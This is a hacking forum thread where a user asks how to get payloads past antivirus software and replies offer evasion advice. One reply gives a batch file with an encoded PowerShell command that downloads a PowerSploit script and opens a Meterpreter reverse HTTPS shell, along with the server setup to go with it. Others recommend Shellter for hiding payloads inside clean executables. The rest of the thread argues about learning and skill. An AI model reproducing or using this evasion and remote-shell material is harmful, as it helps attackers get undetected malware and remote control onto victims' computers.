Forum Thread: Is There Today a Real Way of Bypassing AV ?

Hi Guys,
First of all, sorry for my english.
I'm asking myself if there is today a real way of bypassing AV. I tried a lot of techniques buy they didn't work :

  • Shikataganai : This module doesn't make any effect on payloads since several months/years.
  • I tried some other techniques like fetching payload on the net, making unused loops etc... they don't work
  • packers like UPX seem not to be effective.
  • Encrypting shellcode with RSA algorithm isn't effective. Indeed, the payload is caught when the shellcode is decrypted.
  • Plus, I have to write almost all payloads with C language and not with Python or Ruby because programs to convert py/rb to exe like pyinstaller/py2exe and ocra are all caught by antiviruses. Even a python program with a single print function is caught by antivirus as a malware.

So when I see all that, I ask myself if today there is a real and working way to bypass AV. They have more and more detection techniques like memory based signature detection, heuristic and dynamic analysis..

I don't want an entire payload or something like that. I just want possible bypassing techniques to understand. Maybe DLL injection techniques are effective ?

Thank You.

11 Responses

Dunno mate try creating normal payload if u can and try using some of these guides if you are using metasploit/kali:

Here

OR here

It may be helpful and good in many other ways. Don't really know what should i mention about payloads the tutorials up on youtube are hella old. But i just have to say believe in yourself and you will find the right way and remember hacker always finds a way.

You can use Shellter. Pick an exe file that's not normally detected by AV and it will inject your payload in it. I've had great success with it. My favorite thing to do is create my own exe file with Iexpress in Windows and then use it in Shellter. You can have fun coming up with other ideas on how to disguise it.

Encrypted Powersploit payload in .bat compiled to .exe using a batch to exe compiler.
Example:
-------------------------------
@echo off

PowerShell.exe -Exec ByPass -Nol -Enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgA2ADoAOAAwADAAMAAvAHAAbwB3AGUAcgBzAHAAbABvAGkAdAAtAHAAYQB5AGwAbwBhAGQAIgApADsAIABJAG4AdgBvAGsAZQAtAFMAaABlAGwAbABjAG8AZABlACAALQBQAGEAeQBsAG8AYQBkACAAdwBpAG4AZABvAHcAcwAvAG0AZQB0AGUAcgBwAHIAZQB0AGUAcgAvAHIAZQB2AGUAcgBzAGUAXwBoAHQAdABwAHMAIAAtAEwAaABvAHMAdAAgADEAOQAyAC4AMQA2ADgALgAxAC4ANgAgAC0ATABwAG8AcgB0ACAANAA0ADQANAAgAC0ARgBvAHIAYwBlAAoA

---------------------------------

It's a reverse_https payload, lhost is set to 192.168.1.6, lport is set to 4444, URL is set to http://192.168.1.6:800o/powersploit-payload

So you have to set up a listener and server, for server :

  • cd /var/www/html && python -m SimpleHTTPServer 8000

If you really want to bypass AV detection, you first have to learn about how AV detection works and then realise that all these free, public tools aren't going to help you. Common packers like UPX have all been reverse engineered by AV companies so the AV software can automatically unpack them on disk which makes it useless.

You'll need to learn how to build your own crypter/packer/protector so git gud and start learning how to really hack, none of this bullshit Kali/Metasploit/Veil-Evasion/Shellter anymore. No serious hacker relies on premade tools, especially free and public ones. Get away from using scripts like Python and converting it to .exe using cheap, hacky methods, learn to code in a proper native-compiled language like C or C++. Make your own payloads.

If you ever reach a greater stage of hacking, you'll know how bad AV software is and that they're pretty much useless right now against new (making your own payloads which has never been seen before) threats. Ask anyone who knows what they're doing and they'll say the same thing.

There's no harm in learning how to hack by using others tools and programs. Yes, your goal should be to be able to make your own, but it's going to be extremely hard if you don't have practice. Btw, Shellter works fine to by pass AV detection.

I'm going to reiterate my point if you missed it. Don't expect to be able to do anything (amazing) if you stick to using other's tools. If you don't start putting some serious effort and time into building your foundations, no matter how many tools you have, you're still like any other script kiddie.

Want to know how many times I've used Kali to achieve something or how many times that I've actually booted my Kali machine? I could probably count it on the fingers of one hand. And how long have I been doing cyber security? More than 3 years, all of which was spent researching on Google, going through many books and papers, practising programming, making my own programs and breaking open other's, learning how a system works... not playing around with tools on Kali.

If you want to do something like understanding AV and bypassing them, this should be your routine. Have the proper attitude, go out and thirst for knowledge. Don't sit back and think this is some easy game hoping that someone will make a magical tool that will hack things for you on the press of a button. Don't complain that hacking is difficult because it is and until you face the reality of it, you're not going to make it far so you might as well give up now. If you aren't hurting, you're not trying hard enough.

This is probably the realest thing that will ever touch Null Byte. There's so many fake claims here and too much false hope as a result of that. But, it's to be expected considering how management is running this place: attract all the kids with clickbait titles to scrape money off ads. Honestly, I don't even know why I'm still here on this website...

Dude. Chill. If you are such an amazing hacker, write a tutorial for something "amazing".

Presumably to teach people to see through your eyes and go through a similar journey when learning about this stuff. That's why most of us are here. But everyone learns differently that's why variety is important.

Kali teaches proof of concepts and that's important to a lot of people. You sound like you learn how I learn, but this stuff is computer science and it's fucking hard for some people to see the value in learning. I think everyone deserves a shot, you have to provide a little candy to get people interested enough to sit down and understand or try it themselves. The culture you're talking about is how people grow up once they've understood the core proof of concepts.

First of all Thank you everybody for your replies.

Of course, I have to learn several things. Don't think I'm a 14yo kid who wants to hack his girlfriend. I'm serious and I want to learn seriously. I have just done some tests with the tools that I said but I know very good that hacking is before all learning a lot. I use Kali Linux tools just because I don't have real time but not because I'm not able to write them by myself. Indeed, I have written several tools by myself just for fun in the past..

INT3H you goddamn right ! I'm ready to be good in C and write my own crypter/packer/protector, but I want some tutorials, because even if I can write a payload by myself, I'm a a newbie in AV evasion domain. I hate using some tools like Shellter and Veil-Evasion to do my job. SO I want to learn, but I need some tutorials. I have already read some papers about AV bypassing to see their catching methods.

Thank You Guys.

Keep us updated as you learn!

I CALL BS

You can learn from everything and null-byte is a very good site to entice you. You can't expect from someone to wake up one day and be interested in computer science. All you die-hard hackers out there saying that everyone who is not a seasoned veteran programmer is cursed to be a script kiddie are not helping. Don't say C is king , say try other ways if you succeed very good if you fail you learn which is way better. In this life you win or you learn. We all begin from little things like Kali or metasploit or sqlmap. Hell most of the teenagers who will be the hackers of tomorrow right now want to hack a girl's fb account. Because you didn't have fb when you where a teen doesn't mean that being enticed by that is something bad. FFS

Share Your Thoughts

  • Hot
  • Active